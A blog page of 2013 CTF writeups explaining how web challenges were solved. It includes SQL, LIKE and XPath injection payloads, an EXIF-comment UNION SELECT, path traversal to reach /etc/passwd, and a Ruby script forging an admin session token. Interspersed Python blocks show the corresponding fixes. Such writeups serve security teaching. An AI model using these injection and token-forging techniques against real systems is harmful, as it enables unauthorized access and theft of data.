A disturbing lack of taste. Just another WordPress site

22 Jul 2013

UFO CTF 2013 – Web300 Writeup

The challenge is a site with SSL support for both the mobile version and the desktop one. There is a registration form; once logged in you can attach a device and store your "secret". Obviously the goal was to log in as admin or somehow get his secret. The challenge provides an Android application (SecureSpaceAuth.apk). After installing it and testing a bit I managed to see which HTTP requests it was making by pointing the challenge site's DNS name at my own webserver. With a logger I saw two interesting ones:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=&password=&device=

https://spaceauth.tasks.ufoctf.ru/?act=auth2&username=&key=&device=

The first one attaches a new device given the username and the password, and the second one completes the auth process. After testing a bit I found that the device parameter was vulnerable to SQL injection, and the error report showed that it runs inside an UPDATE query. So basically with this SQL we can set ourselves as admin:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=kappa&password=kappa1&device=dvpro',admin=1;%23

But first we have to create the new device:

https://spaceauth.tasks.ufoctf.ru/?act=attach2&username=kappa&password=kappa&device=dvpro

and then authenticate us

https://spaceauth.tasks.ufoctf.ru/?act=auth2&username=kappa&key=39b7b&device=dvpro

The important thing to keep in mind is that all these steps have to be done with a crafted User-Agent simulating an Android system, because these requests are accepted only from a mobile device: the queries only run under that condition.

Now just log in with your account and get the admin secret.

Razor4x

Filed under: Uncategorized
22 Jul 2013

UFO CTF 2013 – Web100 Writeup

The challenge was made of 3 auth levels, and the aim is to bypass them through SQLi. The annoying thing about this challenge is that no feedback is provided about your query, so you have to guess the most common mistakes until you find the right one.

First auth.

The first one is as easy as it is tricky, because it is an OR injection but the strings are enclosed in double quotes rather than single quotes, so a classic ' OR '1'='1 won't work. Use " OR "1"="1 instead. Now that you have bypassed auth1 you also have to pick up the right password of the "admin1" user blindly. In this case a regular blind SQLi with substr() + ascii() will work.

Second auth.

Now that you have the password for auth1 we can move on to auth2. This time things get a little harder, but it still remains an easy challenge. The hardest part was to understand that we are playing with a LIKE query with almost everything filtered, but with a LIKE statement we can make it true by using wildcards such as %, which matches any sequence of characters. So the POST body would look like this:

username=admin1&level1_password=MyPasswordIsNotTheFlag&level2_password=%
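The auth2 weakness is worth seeing next to its fix, because it survives parameterised queries: binding the value stops SQL injection, but LIKE still interprets % and _ inside the bound value. The following is an added example, not the challenge's code; the table layout and the stored level-2 password are assumptions, and it uses SQLite.

```python
import hmac
import sqlite3

# Added example, not the challenge's code. Table layout and the stored level-2
# password are assumptions; the point is how LIKE treats a bound value.

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (username TEXT PRIMARY KEY, level2_password TEXT)")
    db.execute("INSERT INTO accounts VALUES (?, ?)", ("admin1", "MySecondPassword"))
    return db

def check_like(db, username, level2_password):
    # Placeholders stop the value from being parsed as SQL, but LIKE still
    # interprets '%' and '_' inside it, so a bare '%' matches any password.
    row = db.execute(
        "SELECT 1 FROM accounts WHERE username=? AND level2_password LIKE ?",
        (username, level2_password)).fetchone()
    return row is not None

def escape_like(value, esc="\\"):
    # For queries that genuinely need LIKE: neutralise the wildcard characters
    # and pair the result with an ESCAPE clause.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))

def check_like_escaped(db, username, level2_password):
    row = db.execute(
        "SELECT 1 FROM accounts WHERE username=? AND level2_password LIKE ? ESCAPE '\\'",
        (username, escape_like(level2_password))).fetchone()
    return row is not None

def check_fixed(db, username, level2_password):
    # A password check is an equality test, not a pattern match: fetch the
    # stored value by key and compare it in constant time.
    row = db.execute("SELECT level2_password FROM accounts WHERE username=?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(
        row[0].encode("utf-8"), level2_password.encode("utf-8"))

def demo():
    db = fresh_db()
    return {
        "like_wildcard": check_like(db, "admin1", "%"),                          # True: bypass
        "like_correct": check_like(db, "admin1", "MySecondPassword"),            # True
        "escaped_wildcard": check_like_escaped(db, "admin1", "%"),               # False
        "escaped_correct": check_like_escaped(db, "admin1", "MySecondPassword"), # True
        "fixed_wildcard": check_fixed(db, "admin1", "%"),                        # False
        "fixed_correct": check_fixed(db, "admin1", "MySecondPassword"),          # True
    }

if __name__ == "__main__":
    for name, ok in demo().items():
        print(name, ok)
```

The escaped variant is there for code that really needs pattern matching on user input; a credential check never does, so check_fixed is the shape to copy.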

But as in auth1 we have to find the auth2 password. How? I coded a script to do this: http://pastebin.com/UPDwMFDw.

Third auth.

Last auth, finally! In this auth some feedback is provided, so it was very easy to solve: in fact you have two passwords to input (apart from those for auth1 and auth2) and they must be equal, otherwise an error pops up. If we input a random password we'll see an error like ..query failed : password3.1 password3.2, meaning both have failed, but if we input ' or '1'='1 we'll see an error like ..query failed : password3.2, meaning password3.1 has executed correctly. So basically our true/false condition for the blind SQLi is based on the presence of the "password3.1" error. Code equivalent to the previous one for getting the password is here: http://pastebin.com/gQvQy1c0

Now just log in and get the flag.

Razor4x


22 Jul 2013

UFO CTF 2013 – Web75 Writeup

The challenge gave us this link:

http://uploader.earth.tasks.ufoctf.ru/?fileid=dcfd9cbaee181d457598465297b662814d19cff1

Inside this you find the download link of the requested file, the cipher used to encrypt it and other fields. At first glance the vulnerability could be an LFI or a SQLi, but looking further at the download link:

http://uploader.earth.tasks.ufoctf.ru/secret_uploads/dcfd9cbaee181d457598465297b662814d19cff1/TopSecret_Report_For_You_MrLOL.txt

you can see the path where the file is. So now, as you may have guessed, the vulnerability was basically directory listing. In fact you can browse the directories easily, and after that I found an interesting file: uploader.earth.tasks.ufoctf.ru/secret_uploads/f6140944d4fa3976ef04f81792d2c88562872a2d/Mr.LOL_earth.documents.zip

Now there is another problem: the aes-cbc-256 encryption of the text. Inside every directory there is a file called ._secret, and inside it you can find the key to decrypt the content of the file. So now it's a piece of cake:

openssl enc -d -aes-256-cbc -in Mr.LOL_earth.documents.zip -out a.zip

Now just unzip and open the image to see the flag...

Razor4x

19 Jul 2013

DIMVA CTF 2013 – Web200 Writeup

When I went to the challenge page the script complained about missing parameters (user and password missing from the xml parameter). So we tried adding ?xml=<login><user>YmxhaA==</user><password>YmxhaA==</password><login> (user and password must be base64 encoded) and an authentication error came out. After some testing an XPath injection was revealed in the password parameter (maybe also in user, I didn't test it). No chance to get the password by concatenating the queries, so we had to go blind. This is the script I used to extract the flag:

http://pastebin.com/Vp4fxy3T

The //User/ReportURL field was taken from the /users.xml~ file (when you log in successfully an HTML comment informs you of its existence).
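For contrast, here is how the same lookup against a users.xml-style file looks when request data is kept out of the XPath expression. This is an added example and not the challenge's code; the document, element names and credentials are constructed, and the only thing taken from the writeup is the shape of the injectable query.

```python
import base64
import hmac
import xml.etree.ElementTree as ET

# Added example, not the challenge's code: the lookup against a users.xml-style
# file done without building an XPath expression from request data. The
# document, element names and credentials are constructed.
USERS_XML = b"""<Users>
  <User><Name>alice</Name><Password>s3cret</Password><ReportURL>/reports/1</ReportURL></User>
  <User><Name>bob</Name><Password>hunter2</Password><ReportURL>/reports/2</ReportURL></User>
</Users>"""

def b64(text):
    return base64.b64encode(text.encode("utf-8")).decode("ascii")

def decode_credentials(user_b64, pw_b64):
    # validate=True rejects non-base64 input instead of silently skipping it.
    try:
        user = base64.b64decode(user_b64, validate=True).decode("utf-8")
        pw = base64.b64decode(pw_b64, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, pw

def injectable_xpath(user_b64, pw_b64):
    # The pattern behind the writeup: decoded values spliced into the query.
    # A quote inside the password closes the literal and the remainder of the
    # input becomes part of the predicate. Returned as text, never evaluated.
    creds = decode_credentials(user_b64, pw_b64)
    if creds is None:
        return None
    return "//User[Name='%s' and Password='%s']/ReportURL" % creds

def report_url(doc, user_b64, pw_b64):
    # Fixed path, comparison done in code: request data never reaches the parser.
    creds = decode_credentials(user_b64, pw_b64)
    if creds is None:
        return None
    user, pw = creds
    root = ET.fromstring(doc)
    for node in root.findall("./User"):
        if node.findtext("Name", "") != user:
            continue
        stored = node.findtext("Password", "").encode("utf-8")
        if hmac.compare_digest(stored, pw.encode("utf-8")):
            return node.findtext("ReportURL")
        return None
    return None

if __name__ == "__main__":
    print(injectable_xpath(b64("blah"), b64("' or '1'='1")))
    print(report_url(USERS_XML, b64("alice"), b64("s3cret")))
    print(report_url(USERS_XML, b64("alice"), b64("' or '1'='1")))
```

With the comparison done in code, the quote in the password is just a character that fails to match; there is no expression for it to escape from.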


Razor4x

19 Jul 2013

DIMVA CTF 2013 – Trivia50 (II) Writeup

This trivia wanted our input, hashed with an "unknown" method, to start with the string "1000000". The first chars of a hashed input are also provided; for example the hash of 123 is "4f68465". Detecting the hash algorithm was extremely easy: in fact we can check all the hashing methods supported with hash_algos() and see which one returns "4f68465" for the input "123":

<?php
// Try every algorithm PHP knows and print those whose hash of "123" starts with 4f68465
$arr=hash_algos();
for($i=0;$i<count($arr);$i++){
    if(preg_match('/^4f68465/', hash($arr[$i],"123")))
        echo $arr[$i]."\n";
}
?>

It returned "salsa20". Knowing this we can now just set up a brute-force script to find which string starts with "1000000":

<?php
// Count upwards and print the first inputs whose salsa20 hash starts with 1000000
for($i=1;$i<9999999000;$i++){
   if(preg_match('/^1000000/', hash("salsa20",$i)))
        echo $i."::::::::".hash("salsa20",$i)."\n";
}
?>

The number was 460825513.

Razor4x


19 Jul 2013

DIMVA CTF 2013 – Web100 Writeup

The site gives us an image uploader where you can add your photos (only JPG images are accepted) to a gallery (one per team). The vulnerability was very easy to exploit: when you upload the image the script takes its comment (if it doesn't exist it dies with an error) and inserts it into a SQLite database.

So just download exiv2 and run:

$exiv2 -c "' union select password from pictures-- -" index4 

Then upload it and get flag.
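Both this challenge and the UFO CTF Web300 one above come down to a value (an EXIF comment, a device name) pasted into a statement. The following added example, which is not the challenges' code, shows the SQLite equivalent of each injectable statement next to its parameterised form; the table and column names are assumptions modelled on the writeups, and since SQLite's comment marker is -- rather than #, the device payload uses that.

```python
import sqlite3

# Added example (not the challenges' code): the SQLite equivalent of the two
# injectable statements described above, each next to its parameterised form.
# Table and column names are assumptions modelled on the writeups.
SCHEMA = """
CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT,
                    device TEXT, admin INTEGER NOT NULL DEFAULT 0);
CREATE TABLE pictures (id INTEGER PRIMARY KEY, comment TEXT);
INSERT INTO users (username, password) VALUES ('kappa', 'kappa');
"""

def fresh_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db

def attach_device_vulnerable(db, username, password, device):
    # The device name is pasted into the statement, so a quote ends the
    # literal and the rest of the value is executed as SQL.
    db.execute("UPDATE users SET device='%s' WHERE username='%s' AND password='%s'"
               % (device, username, password))

def attach_device_safe(db, username, password, device):
    # Placeholders: the driver binds the value, it is never parsed as SQL.
    db.execute("UPDATE users SET device=? WHERE username=? AND password=?",
               (device, username, password))

def store_comment_vulnerable(db, comment):
    # Same defect on an INSERT: the EXIF comment becomes part of the statement.
    db.execute("INSERT INTO pictures (comment) VALUES ('%s')" % comment)

def store_comment_safe(db, comment):
    db.execute("INSERT INTO pictures (comment) VALUES (?)", (comment,))

def is_admin(db, username):
    return db.execute("SELECT admin FROM users WHERE username=?", (username,)).fetchone()[0]

def device_of(db, username):
    return db.execute("SELECT device FROM users WHERE username=?", (username,)).fetchone()[0]

def last_comment(db):
    return db.execute("SELECT comment FROM pictures ORDER BY id DESC LIMIT 1").fetchone()[0]

# Constructed inputs in the shape of the two writeups (SQLite uses '--' as its
# comment marker, so it stands in for the '#' used against MySQL above).
DEVICE_PAYLOAD = "dvpro', admin=1 --"
COMMENT_PAYLOAD = "' || (SELECT password FROM users WHERE username='kappa') || '"

def demo():
    """Run each payload against the vulnerable and the parameterised version."""
    results = {}
    db = fresh_db()
    attach_device_vulnerable(db, "kappa", "kappa", DEVICE_PAYLOAD)
    results["vuln_admin"] = is_admin(db, "kappa")      # 1: the WHERE clause was commented out
    db = fresh_db()
    attach_device_safe(db, "kappa", "kappa", DEVICE_PAYLOAD)
    results["safe_admin"] = is_admin(db, "kappa")      # 0: the payload is just a device name
    results["safe_device"] = device_of(db, "kappa")    # the literal payload text
    db = fresh_db()
    store_comment_vulnerable(db, COMMENT_PAYLOAD)
    results["vuln_comment"] = last_comment(db)         # 'kappa': the subquery ran
    db = fresh_db()
    store_comment_safe(db, COMMENT_PAYLOAD)
    results["safe_comment"] = last_comment(db)         # the literal payload text
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print("%s: %r" % (key, value))
```

The fix is the same in both places and does not depend on filtering the input: once the value travels as a bound parameter, quotes, comment markers and subqueries inside it are stored as text.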

Razor4x

7 Jul 2013

SIGINTCTF 2013 – PROtocol Writeup

In this challenge we have to connect to the server, but instead of using TCP as the transport protocol the server used SCTP. So after connecting to it a weird output was provided. You could easily tell that it was the flag, but every char had changed its position, leaving the flag shuffled. Analyzing the traffic with tshark I saw that each char's original position was given by the SID of its data chunk, for example:

-- DATA CHUNK --
...
SID=0x0005
...
Value='N'

This means that the char N was at the 5th place in the original string. Filtering the SID with tshark is easy:

tshark -R "sctp" -Tfields -e "sctp.data_sid"

Running this while you are connecting to the server will give you the SIDs that tshark has captured. Now we have the SIDs and their corresponding values (the server's output), so just reconstruct the string with this little perl script:

#!/usr/bin/perl
@int=(0x0058,0x0020,0x003e,0x0013,0x0019,0x0065,0x005f,0x000d,0x0023,0x005e,0x0007,0x004d,0x0012,0x0040,0x000a,0x0039,0x0068,0x0064,0x0046,0x0003,0x002a,0x003c,0x003a,0x0022,0x0063,0x0052,0x0053,0x0034,0x0038,0x002c,0x0018,0x002d,0x0044,0x0001,0x003b,0x0055,0x0042,0x0035,0x005b,0x0056,0x002f,0x0009,0x0043,0x0036,0x0024,0x0067,0x0054,0x001d,0x001e,0x003d,0x0021,0x0016,0x0059,0x0029,0x0032,0x0027,0x004f,0x0069,0x0066,0x0062,0x002b,0x0017,0x0002,0x005c,0x004c,0x0050,0x0051,0x0006,0x0026,0x004a,0x0008,0x0060,0x000f,0x0011,0x001f,0x002e,0x0030,0x003f,0x0047,0x004e,0x0049,0x0048,0x0041,0x005d,0x0004,0x000c,0x0037,0x005a,0x006a,0x0028,0x0057,0x001a,0x0045,0x0015,0x0010,0x0014,0x004b,0x0031,0x0025,0x0000,0x0033,0x001c,0x001b,0x0061,0x000b,0x000e,0x0005);
$str="5cdcf96950d5ec32538I47c3f7a359315Ie0a2045118afc61ff38a92dc24d0Gd029_2b93a6c762abd89eN8dbdd71dcfda0bSbec524T";
@crap=split //,$str;   # received (shuffled) characters, in arrival order
# For each original position $i, find the chunk whose SID is $i and print its character
for($i=0;$i<=$#int;$i++){
    for($j=0;$j<=$#int;$j++){
        if($i==$int[$j]){
            print $crap[$j];
        }
    }
}
print "\n";
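The same reconstruction, generalised a little: read the SIDs from tshark's field output, pair them with the received characters, and make a lossy capture visible instead of silently producing a shorter string. This is an added example, not the writeup's script; the tshark output and the received text are constructed to match each other.

```python
# Added example, not the writeup's script: rebuild a message whose characters
# arrived one per SCTP DATA chunk, using each chunk's stream identifier (SID)
# as the character's position. The field output below is constructed in the
# shape of `tshark -T fields -e sctp.data_sid` (one value per chunk, in
# capture order); the received text is constructed to match it.
TSHARK_SIDS = """\
5
0
3
1
4
2
"""
RECEIVED = "msetar"   # what came off the socket, in arrival order

def parse_sids(text):
    """One SID per line. tshark prints decimal; the dissection in the writeup
    shows 0x hex, so both forms are accepted."""
    sids = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        sids.append(int(line, 16) if line.lower().startswith("0x") else int(line))
    return sids

def reassemble(sids, received, length=None, gap="?"):
    """Place each character at index SID. Unseen positions are filled with
    `gap` and a duplicate SID raises, so a lossy capture does not go unnoticed."""
    if len(sids) != len(received):
        raise ValueError("%d SIDs but %d characters" % (len(sids), len(received)))
    if length is None:
        length = max(sids) + 1 if sids else 0
    slots = [None] * length
    for sid, ch in zip(sids, received):
        if sid >= length:
            raise ValueError("SID %d beyond message length %d" % (sid, length))
        if slots[sid] is not None:
            raise ValueError("SID %d carried twice" % sid)
        slots[sid] = ch
    return "".join(gap if c is None else c for c in slots)

def demo():
    return reassemble(parse_sids(TSHARK_SIDS), RECEIVED)   # "stream"

if __name__ == "__main__":
    print(demo())
```

Placing characters directly by index replaces the nested loop of the perl script with a single pass, and the gap marker shows exactly which chunks the capture missed.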

Razor4x

7 Jul 2013

SIGINT CTF 2013 – notes Writeup

Another challenge from SIGINT CTF. The organizers gave us the source code of this little CMS where, after registration, you can create a message that only you and the admin can see. The aim of this one was to log in as admin and read his secret (flag). After logging in with my account I saw that 3 cookies had been created: login_time, login_token and login_name. Well, login_time is as self-explanatory as login_name, but login_token isn't. This is a piece of code that may help you understand how it is generated:

web.rb

login_token= user.login_token(login_time)

user.rb

        def login_token(salt)
            check_authorized
            password_data= Data.new(@user_dir+"password_hash")
            password_data.readlock do
                Digest::SHA256.hexdigest(password_data.read+salt)
            end
        end

So login_token takes the time as seed. In the login_token function we see another variable initialized, password_data. As you may understand it's a file (source/data/users/<user>/password_hash) containing a string: $2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O

This one is from the admin user; concatenated with the salt (login_time) and SHA256'd it gives the login_token. So generating one that fits admin is extremely easy. Just take a good login_time from your cookies after logging in with your account and put it in this piece of code:

#!/usr/bin/ruby

require "digest"
password_data="$2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O"   # admin's password_hash file
salt="1373119012"                                                              # login_time from your own cookie
login_token = Digest::SHA256.hexdigest(password_data+salt)                      # same construction as user.rb
puts login_token

and it will give you the login_token. Now replace the old one with it, set login_name to admin and you'll be him.
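The root cause is that every input to the token is either public (login_time) or readable by anyone with the source tree (the password hash), and nothing binds the token to login_name. The following added example, which is not the CMS's code, puts the writeup's construction next to a token keyed with a server-side secret; the password hashes and the login_time are constructed placeholders, not the challenge's values.

```python
import hashlib
import hmac
import secrets
import time

# Added example, not the CMS's code: the login_token construction from the
# writeup beside a version keyed with a server-side secret. The password hashes
# and login_time are constructed placeholders, not the challenge's values.
STORED_HASHES = {
    "admin": "$2a$13$PLACEHOLDERadminHashNotTheRealOne0000000000000000000000",
    "kappa": "$2a$13$PLACEHOLDERkappaHashNotTheRealOne0000000000000000000000",
}
SERVER_KEY = secrets.token_bytes(32)   # generated at startup, never sent to a client

def weak_token(password_hash, login_time):
    # SHA256(password_hash + login_time): anyone who can read the stored hash
    # computes the same value for any login_time they choose.
    return hashlib.sha256((password_hash + login_time).encode("utf-8")).hexdigest()

def server_weak_cookies(login_name, login_time):
    """What the CMS hands out: name, time and the hash-derived token."""
    return {"login_name": login_name, "login_time": login_time,
            "login_token": weak_token(STORED_HASHES[login_name], login_time)}

def keyed_token(login_name, login_time, key=SERVER_KEY):
    # HMAC over the claims under a secret only the server holds: the token is
    # bound to the user name and time, and the password hash is not an input.
    msg = ("%s|%s" % (login_name, login_time)).encode("utf-8")
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

def verify_keyed(login_name, login_time, token, key=SERVER_KEY, max_age=3600, now=None):
    now = time.time() if now is None else now
    if not login_time.isdigit() or not 0 <= now - int(login_time) <= max_age:
        return False
    return hmac.compare_digest(keyed_token(login_name, login_time, key), token)

def demo():
    t = "1700000000"
    later = int(t) + 60
    leaked_hash = STORED_HASHES["admin"]          # readable from the shipped source tree
    attacker_key = b"not the server key"
    return {
        # Weak scheme: a token minted from the leaked hash equals the server's own.
        "weak_forged": weak_token(leaked_hash, t) == server_weak_cookies("admin", t)["login_token"],
        "keyed_valid": verify_keyed("admin", t, keyed_token("admin", t), now=later),
        "keyed_forged": verify_keyed("admin", t, keyed_token("admin", t, key=attacker_key), now=later),
        "keyed_other_user": verify_keyed("admin", t, keyed_token("kappa", t), now=later),
        "keyed_expired": verify_keyed("admin", t, keyed_token("admin", t), now=int(t) + 7200),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

A server-side session store is the more common choice; the keyed token is shown because it keeps the cookie layout the CMS already uses while removing the property the writeup relies on.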

Razor4x

7 Jul 2013

SIGINT CTF 2013 – mail Writeup

The challenge gives you a mail with an attachment: a base64-encoded archive. After decoding and extracting it a ruby file popped out. Analyzing it, the script is a kind of shell where the commands are sent in the email's subject field. You can sign up for an account (in which case a folder is created), get the files inside your account, share files with others, create files, etc. In these last cases the input was hard-filtered by regex so that you can input only alphanumeric chars. Everything was filtered except the signup form. The vulnerability was very easy to find and exploit: since during signup the source mail address wasn't filtered, we could point our home directory to another one like this

asdasd/../../../../[email protected]

So now we have basically pointed our home directory to /etc with the account name asdasd/../../../../[email protected] (a fake mailer was used to accomplish this). Now create a new message from the previous account where the subject is: share passwd [email protected]. Now just log in to the [email protected] mailbox and get passwd to pick up the flag.
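The missing check is the same one the other commands already had, applied to the signup address, plus a confirmation that the resolved directory is still under the accounts root. The following is an added example and not the challenge's script; the root path and the addresses are constructed.

```python
import os
import re

# Added example, not the challenge's script: derive an account's home
# directory from the signup address and refuse anything that leaves the
# accounts root. The root and the addresses are constructed.
ROOT = "/srv/mailshell/accounts"
TRAVERSAL = "asdasd/../../../../etc@example.test"
# Local part and domain limited to address characters; no '/' can get through.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._+-]{1,64}@[A-Za-z0-9.-]{1,255}$")

def home_dir_unchecked(root, address):
    # The writeup's bug in miniature: the address is used as a path as-is,
    # so '..' segments walk out of the accounts root.
    return os.path.normpath(os.path.join(root, address))

def inside(root, path):
    # Resolve both sides (symlinks included) before comparing.
    root_real = os.path.realpath(root)
    return os.path.commonpath([root_real, os.path.realpath(path)]) == root_real

def home_dir_checked(root, address):
    """Allow-list the address, then confirm the resolved path is still under root."""
    if not ADDRESS_RE.fullmatch(address):
        raise ValueError("address contains characters outside the allow-list")
    candidate = os.path.join(os.path.realpath(root), address)
    if not inside(root, candidate):
        raise ValueError("resolved home directory escapes the accounts root")
    return candidate

def accepts(root, address):
    try:
        home_dir_checked(root, address)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    print(home_dir_unchecked(ROOT, TRAVERSAL), inside(ROOT, home_dir_unchecked(ROOT, TRAVERSAL)))
    print(accepts(ROOT, "alice@example.test"), accepts(ROOT, TRAVERSAL))
```

The allow-list alone would have been enough here; the containment check is kept because it also catches a later loosening of the regex or a symlink planted inside the root.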

Razor4x

5 Jul 2013

DEF CON CTF Qualifier 2013 – OGMCMA1 Writeup

The task was to solve the 8-puzzle game 50 times within a short time. Once you connect, the 8-puzzle board is disclosed, so you have to code a parser to fit it into a proper structure, and obviously the game solver. I took the latter from here: http://brandon.sternefamily.net/files/8-puzzle.txt, coded a parser myself and tried to find a way to solve it as fast as possible. I discovered later that you could also move the numbers with "l,u,r,d" and not only with left, right etc., with the advantage that you can concatenate them and so solve it in one shot.

Here is the code: http://pastebin.com/zrUxPtQj
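For readers who want to see the parser-plus-solver loop in one place, here is an added example that is not the writeup's code or the linked solver: it parses a board in an assumed format (nine tokens row by row, with _ or 0 for the blank), solves it with A* under the Manhattan-distance heuristic, and emits the answer as one "l/u/r/d" string. The letters here give the direction the blank moves; the challenge may define them as the direction the tile moves, in which case as_tile_moves() flips them.

```python
import heapq

# Added example, not the writeup's parser or solver. Board format is assumed:
# nine tokens, row by row, '_' or '0' for the blank. Move letters describe the
# direction the blank moves; as_tile_moves() gives the tile's view instead.
GOAL = (1, 2, 3, 4, 5, 6, 7, 8, 0)
DELTA = {"u": -3, "d": 3, "l": -1, "r": 1}
FLIP = {"u": "d", "d": "u", "l": "r", "r": "l"}

def parse_board(text):
    values = [int(t) for t in text.replace("_", "0").split()]
    if sorted(values) != list(range(9)):
        raise ValueError("expected the tokens 0-8 (or _) exactly once each")
    return tuple(values)

def manhattan(state):
    total = 0
    for idx, tile in enumerate(state):
        if tile:                        # the blank does not count
            goal = tile - 1
            total += abs(idx // 3 - goal // 3) + abs(idx % 3 - goal % 3)
    return total

def neighbours(state):
    blank = state.index(0)
    row, col = divmod(blank, 3)
    for letter, delta in DELTA.items():
        if (letter == "u" and row == 0) or (letter == "d" and row == 2) or \
           (letter == "l" and col == 0) or (letter == "r" and col == 2):
            continue
        nxt = list(state)
        nxt[blank], nxt[blank + delta] = nxt[blank + delta], nxt[blank]
        yield letter, tuple(nxt)

def solvable(state):
    # On a 3x3 board a configuration is reachable iff its tile inversions are even.
    tiles = [t for t in state if t]
    inversions = sum(1 for i in range(8) for j in range(i + 1, 8) if tiles[i] > tiles[j])
    return inversions % 2 == 0

def solve(state):
    """A*: the shortest move string from state to GOAL, or None when unsolvable."""
    if not solvable(state):
        return None
    frontier = [(manhattan(state), 0, state, "")]
    best = {state: 0}
    while frontier:
        _, g, cur, path = heapq.heappop(frontier)
        if cur == GOAL:
            return path
        if g > best[cur]:               # stale queue entry
            continue
        for letter, nxt in neighbours(cur):
            if g + 1 < best.get(nxt, 1 << 30):
                best[nxt] = g + 1
                heapq.heappush(frontier, (g + 1 + manhattan(nxt), g + 1, nxt, path + letter))
    return None

def apply_moves(state, moves):
    for letter in moves:
        state = dict(neighbours(state))[letter]   # KeyError on an illegal move
    return state

def as_tile_moves(moves):
    return "".join(FLIP[m] for m in moves)

if __name__ == "__main__":
    board = parse_board("1 2 3\n4 _ 6\n7 5 8")
    print(solve(board))                            # dr
```

Manhattan distance is admissible for this puzzle, so the path A* returns is the shortest one, which matters when the server counts moves or time.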

Razor4x
